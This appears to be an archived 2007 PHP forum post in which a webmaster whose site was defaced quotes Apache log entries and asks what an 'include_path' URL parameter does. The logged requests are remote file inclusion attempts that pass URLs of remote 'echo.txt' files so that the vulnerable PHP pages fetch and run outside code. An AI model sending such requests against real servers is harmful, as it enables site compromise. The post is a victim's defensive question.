Effect of "include_path" on URL of PHP script — PHP Programming Language

You are here: Effect of "include_path" on URL of PHP script « PHP Programming Language « IT news, forums, messages

Posted by Charles Crume on 10/15/07 01:56

Hello Everyone;

My site was hacked the other day -- someone was able to rename my
index.shtml file and put their own index.html file on my server. Not sure
how it was done, but looking through the log file, I found a lots and lots
of entries where an "include_path" parameter was included in the URL of the
PHP page, as shown below:

69.94.36.155 - - [11/Oct/2007:15:07:23 -0400] "GET
/auction/item.php?id=268/includes/auctionstoshow.inc.php?include_path=http://www.usiauctions.biz/logo/pekok/doc/echo.txt?
HTTP/1.1" 200 56446 "-" "libwww-perl/5.65"

69.94.36.155 - - [11/Oct/2007:15:07:38 -0400] "GET
/auction/includes/settings.inc.php?include_path=http://www.usiauctions.biz/logo/pekok/doc/echo.txt?
HTTP/1.1" 200 75 "-" "libwww-perl/5.65"

69.94.36.155 - - [11/Oct/2007:15:07:39 -0400] "GET
/auction/includes/settings.inc.php?include_path=http://www.usiauctions.biz/logo/pekok/doc/echo.txt?
HTTP/1.0" 200 75 "-" "Mozilla/5.0"

213.194.149.61 - - [11/Oct/2007:15:45:39 -0400] "GET
/auction/index.php?include_path=http://www.baybids.com/uploaded/echo.txt?
HTTP/1.1" 200 78669 "-" "libwww-perl/5.808"

213.194.149.61 - - [11/Oct/2007:15:45:42 -0400] "GET
/index.php?include_path=http://www.baybids.com/uploaded/echo.txt? HTTP/1.1"
404 310 "-" "libwww-perl/5.808"

213.194.149.61 - - [11/Oct/2007:15:46:49 -0400] "GET
/auction/index.php?include_path=http://www.baybids.com/uploaded/echo.txt?
HTTP/1.1" 200 78439 "-" "libwww-perl/5.808"

213.194.149.61 - - [11/Oct/2007:15:46:52 -0400] "GET
/index.php?include_path=http://www.baybids.com/uploaded/echo.txt? HTTP/1.1"
404 310 "-" "libwww-perl/5.808"

213.194.149.61 - - [11/Oct/2007:15:48:11 -0400] "GET
/auction/item.php?id=268/includes/setting.inc.php?include_path=http://www.baybids.com/uploaded/echo.txt?
HTTP/1.1" 200 56360 "-" "libwww-perl/5.808"

213.194.149.61 - - [11/Oct/2007:15:48:13 -0400] "GET
/includes/setting.inc.php?include_path=http://www.baybids.com/uploaded/echo.txt?
HTTP/1.1" 404 325 "-" "libwww-perl/5.808"

213.194.149.61 - - [11/Oct/2007:15:48:13 -0400] "GET
/auction/includes/setting.inc.php?include_path=http://www.baybids.com/uploaded/echo.txt?
HTTP/1.1" 404 333 "-" "libwww-perl/5.808"

I know how "include_path" works when *in* the PHP file, but I'm not sure
what the effect of including it in the URL. A number of entries show a code
404 as the culprits are obviously phising for pages, but requests with
return code 200 are showing a large number of bytes transferred -- far
larger than the PHP page itself.

Can someone explain what adding "include_path" to a URL does?

Is there something I need to check on my server of how I've got Apache
configured?

TIA.

Charles...

Navigation:

Next in forum: Amazing array with reference
Prev in forum: Re: PHP5 - Object
Thread view: Effect of "include_path" on URL of PHP script

[Reply to this message]

Удаленная работа для программистов • Как заработать на Google AdSense • England, UK • статьи на английском • PHP MySQL CMS Apache Oscommerce • Online Business Knowledge Base • DVD MP3 AVI MP4 players codecs conversion help

Home • Search • Site Map • Set as Homepage • Add to Favourites

Сайт изготовлен в Студии Валентина Петручека —
изготовление и поддержка веб-сайтов, разработка программного обеспечения, поисковая оптимизация